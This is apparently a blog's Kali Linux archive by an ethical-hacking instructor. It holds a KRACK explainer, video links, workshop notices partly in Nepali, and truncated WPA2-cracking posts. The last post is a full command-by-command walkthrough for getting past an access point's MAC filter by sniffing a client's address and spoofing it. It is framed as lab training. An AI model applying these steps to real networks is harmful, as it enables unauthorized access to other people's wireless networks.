Category Archives: Kali Linux

KRACK Attack : Key Reinstallation Attacks [EXPLAINED]


You may like : DIGITAL FORENSICS TUTORIAL HERE (YOUTUBE)

https://www.youtube.com/watch?v=3z3Iau04gt8&list=PLEG4CvuvNZddHYjLLrAhhcOedeEPyPVxA

KRACK : Breaking WPA2 by forcing nonce reuse

Discovered by Mathy Vanhoef of imec-DistriNet, KU Leuven

KEY POINT OF KRACK ATTACK :

1) “The attacker doesn’t even need to connect to the network – only to listen to the data you exchange with an access point and emit their own packets back to change things on your system and the router.” – thenextweb

2) Depending on the network configuration, it is also possible to inject and manipulate data. For example, an attacker might be able to inject ransomware or other malware into websites. – krackattacks 

3) “The attack works against all modern protected Wi-Fi networks” – krackattacks 

PAPER (via krackattacks)

Our research paper behind the attack is titled Key Reinstallation Attacks: Forcing Nonce Reuse in WPA2 and will be presented at the Computer and Communications Security (CCS) conference on Wednesday 1 November 2017.

Although this paper is made public now, it was already submitted for review on 19 May 2017. After this, only minor changes were made. As a result, the findings in the paper are already several months old. In the meantime, we have found easier techniques to carry out our key reinstallation attack against the 4-way handshake. With our novel attack technique, it is now trivial to exploit implementations that only accept encrypted retransmissions of message 3 of the 4-way handshake. In particular this means that attacking macOS and OpenBSD is significantly easier than discussed in the paper.

Demo video :

 

Kali Linux For Ethical Hacking 01b – Info Gather with MALTEGO Lab


In this video, we will see awesome tool in Kali Linux, i.e. MALTEGO for information gathering. Maltego is a unique platform developed to deliver a clear threat picture to the environment that an organization owns and operates.

tags :

ethical hacking, kali linux, kali linux tutorial, information gathering kali linux, student video tutorial, bijay acharya, maltego kali linux, maltego

Breaking WPA2 Wireless – (Step by Step with Commands) – BT5r3 Tested


FOLLOW ARTICLE BELOW (Step by Step with Commands)

#Tools used:
airmon-ng
airodump-ng
aireplay-ng
aircrack

AD : Watch “Kali Linux For Ethical Hacking” Video Tutorial in Youtube Here >  https://www.youtube.com/playlist?list=PLEG4CvuvNZdfWvG8lVEBSHJJ8O3cbtWCu
Continue reading Breaking WPA2 Wireless – (Step by Step with Commands) – BT5r3 Tested

Watch “Kali Linux For Ethical Hacking 01a – Info Gather with DMITRY Lab” on YouTube


Information Gathering Tutorial with DMITRY in kali linux. 

Free Ethical Hacking Workshop – Kathmandu oct 2016 “Hackers For Charity”, Hackers House


काठमाडौं मा “Hackers For Charity – NHC” अन्तर्गत पोखरा देखि ktm सम्म आयेर Oct 17, 2016 देखि सुरु भयेको “Ethical Hacking & Cyber Security” तीन दिने वोर्क्सोप आज समापन गर्न सफल भयेको छु । सर्बप्रथम, धन्येबाद चाइ RAC KTM Mid-Town लाई दिन चाहन्छु । धन्येबाद स्वोरूप, धेरै न सके पनि, केइ रकम चाइ Rtr. Alisha Rajbahak (Vice President of RAC KTM MID-TOWN for RY 2016-17) लाई हस्तान्तरण गरेको छु र सो रकम उहाँ आबद्ध रहेको RAC KTM Mid-Town Club मा जाने छ ।

तेसै गरि, RAC KTM MID-TOWN कै भाइ Rtr. Santosh Purbey, Rtr Kapil Ghimire, Rtr.Prabin Sharma र मलाइ Troubleshoot/Volunteer मा अत्याधिक सहयोग गर्ने भाइ Krishna Chalise , Pradeep Kc र Bishnu Chapagain भाइ लाई पनि धेरै धेरै धन्यवाद दिन चाहन्छु ।

-Regards : Bijay Acharya (www.bijayacharya.com)

#nhc #CyberAware #ktmWorkshop #EthicalHacking 

ktm-workshop-by-nhc-bijay-acharya-1 ktm-workshop-by-nhc-bijay-acharya

“Hackers For Charity” – Free Ethical Hacking Workshop Pokhara, Nepal : 2016 – NHC, HCNEPAL


#CyberAware    

And “Hackers For Charity” is rolling. This is day 1 image. 

POKHARA,NEPAL
“Cyber Security For All. Forever Free” #hackersHouse  Thanks for volunteers.   #CyberAware   #nhc   #hcnepal

Call us for training : 9846618997 

[In Nepali] Ethical Hacking Video Part 11 : Enumeration Basics


Video Here, ALL Videos in Nepali language.

[In Nepali] Learn Ethical Hacking – Part 7 – Scanning + NMAP Lab


In this video, I will give some theory of Scanning. After that, I will provide a lab demo on Kali Linux Nmap Command Lines.

Ethical Hacking with Kali Linux [4] – Breaking WPA2 Wireless.


By : Bijay Acharya http://bijayacharya.com/

> > Welcome all, to this series of Kali Linux for Ethical Hacking. This is 4th part, & I’ll explain process of Breaking Wireless WPA2.

# Tools that will be used :

airmon-ng
airodump-ng
aireplay-ng
aircrack

# . . . Let’s Begin,

– Before start, make sure that you have eth0, lo, wlan0 are in action. (go to terminal, & run ifconfig)

– Let’s start to monitor on that wireless interface, run :

READ ALL HERE

Ethical Hacking with Kali Linux [3] – Bypassing MAC Address Filter


BY : BIJAY ACHARYA http://bijayacharya.com/

Ethical Hacking with Kali Linux [3] – Bypassing MAC Address Filter

> > Welcome all, to this series of Kali Linux for Ethical Hacking. This is 3rd part, & I’ll explain process of bypassing MAC Address Filter on an AP (Access Point).

# 3 basic Process :

– Finding the AP : airmon-ng & airodump-ng

– Finding an associated client : airodump-ng

– Finally, using the Macchanger

# . . . Let’s Begin,

– Before start, make sure that you have eth0, lo, wlan0 are in action. (go to terminal, & run ifconfig)

– Let’s start to monitor on that wireless interface, run :

airmon-ng start wlan0

– After executing above command, we must get new interface mon0 (monitor mode enabled)

– Verify that both interfaces are up & running, run

airmon-ng

– Watch for wlan0 & mon0 , Run :

airodump-ng mon0

– For monitoring all the APs that Kali Linux OS can find out.

– In next step, you will get BSSID and ESSID, channel, cipher. If there is any hidden SSID, then ESSID will be format like this : <length: 0> or with no SSID. [We, saw in 2nd part, on how to uncover this hidden SSID]. But, here you can use any SSID with Open Encryption, or SSID with known password. We will use the MAC address, that was seen in part 2. i.e. 00:A1:B2:11:20:13:5T & channel ‘1’ (Assume, MAC address filter is done in this system & lets suppose it’s SSID is nhc-BJ)

– Now, we try to find out the Client & his MAC Associated with this AP (nhc-BJ). So, that we can use that MAC to bypass filter. Run;

airodump-ng -c 1 -a –bssid 00:A1:B2:11:20:13:5T mon0

(-c is for channel, channel is 1 for BSSID we are trying to connect, -a is for showing only the client associated with this BSSID)

– You will get MAC address with Station associated with that AP, and this is client’s station. (Lets assume Mac = 00:C1:52:11:20:13:7D)

– CTRL+C (press)

– Run ;

macchanger –help
(notice, -m for setting mac)

-Run ;

macchanger -m 00:C1:52:11:20:13:7D wlan0

(if Device or resource busy, then run following command)

airmon-ng stop wlan0

– Run ;

macchanger -m 00:C1:52:11:20:13:7D wlan0

(in success, you will see msg like ‘faked MAC’)

-Run ;

ifconfig wlan0 down

ifconfig wlan0 up

(now, lets see whether we can associate with SSID now or not, with this Faked MAC)

Run ;

iwconfig wlan0 essid nhc-BJ channel 1

(if not run in kali, run it in BackTrack. Or, see update version for kali)

iwconfig wlan0

(if success, Access Point will be associated)

“This series is only for educational purpose, practice this series lab in virtual/separate network, always avoid illegal activities, and if you can, then support us to fight against black hat hackers”

# Join our Facebook NHC group, to get most out of this series

http://www.facebook.com/groups/nepalesehackerscommunity

# Register in our NHC Forum Website

http://www.nhc.bijayacharya.com

# For, free video tutorial & minimum priced certificate, register my OCN (Online Course Nepal) here : http://www.ocn.bijayacharya.com(Remember, Videos are free to watch, you will pay only if you want certificate :), so that we can maintain this open source culture)

ATTACHMENTS
image005ab.png
image005ab.png (26.61 KiB)